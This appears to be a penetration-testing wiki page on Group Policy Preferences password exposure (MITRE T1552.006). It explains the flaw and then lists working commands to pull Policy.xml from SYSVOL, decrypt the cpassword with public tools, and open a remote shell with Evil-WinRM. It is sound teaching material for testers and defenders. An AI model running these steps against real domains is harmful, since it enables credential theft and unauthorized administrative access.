Group Policy Preferences

MITRE ATT&CK™ Sub-technique T1552.006

Theory

Windows systems come with a built-in Administrator (with an RID of 500) that most organizations want to change the password of. This can be achieved in multiple ways but there is one that is to be avoided: setting the built-in Administrator's password through Group Policies.

  • Issue 1: the password is set to be the same for every (set of) machine(s) the Group Policy applies to. If the attacker finds the admin's hash or password, he can gain administrative access to all (or set of) machines.

  • Issue 2: by default, knowing the built-in Administrator's hash (RID 500) allows for powerful Pass-the-Hash attacks (read more).

  • Issue 3: all Group Policies are stored in the Domain Controllers' SYSVOL share. All domain users have read access to it. This means all domain users can read the encrypted password set in Group Policy Preferences, and since Microsoft published the encryption key around 2012, the password can be decrypted🤷‍♂️.

Practical

From UNIX-like systems, the Get-GPPPassword.py (Python) script in the impacket examples can be used to remotely parse .xml files and loot for passwords.

# with a NULL session
Get-GPPPassword.py -no-pass 'DOMAIN_CONTROLLER'

# with cleartext credentials
Get-GPPPassword.py 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'

# pass-the-hash
Get-GPPPassword.py -hashes 'LMhash':'NThash' 'DOMAIN'/'USER':'PASSWORD'@'DOMAIN_CONTROLLER'

SYSVOL

smbclient -U 'Username' \\\\<IP>\\SYSVOL

# Download Policy.xml file
get Policy.xml

Decrypt the Password (Manual)

If you have downloaded the Policies.xml file from the remote system's SYSVOL share then you can decrypt the cpassword value using the below tools

pypykatz gppass j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw

gpp-decrypt j1Uyj3Vx8TY9LtLZil2uAuZkFQA/4latT76ZwgdHdhw

Decrypt CPassword (Tool)

gpp-decrypt.rb

# Download
https://github.com/3ls3if/Cybersecurity-Tools/blob/main/ruby-tools/gpp-decrypt.rb

# Run
ruby gpp-decrypt.rb

Note: You need to manual put the cpassword in the source code.

gpp-decrypt.py

# Download 
git clone https://github.com/t0thkr1s/gpp-decrypt

# Installation
python3 setup.py install

# Run
python3 gpp-decrypt.py -f [groups.xml]
or
python3 gpp-decrypt.py -c [cpassword]

Get Remote Shell Access

Evil-WinRM

sudo docker run --rm -ti --name evil-winrm  oscarakaelvis/evil-winrm -i <IP> -u <svc_dbbackup> -p '<password>'

Note: The username above should match the value found in the Policy.xml file. In my case the username was found in the format

newName="svc_dbbackup"

REFERENCES

PreviousCrendentialsNextLLMNR Poisoning

Last updated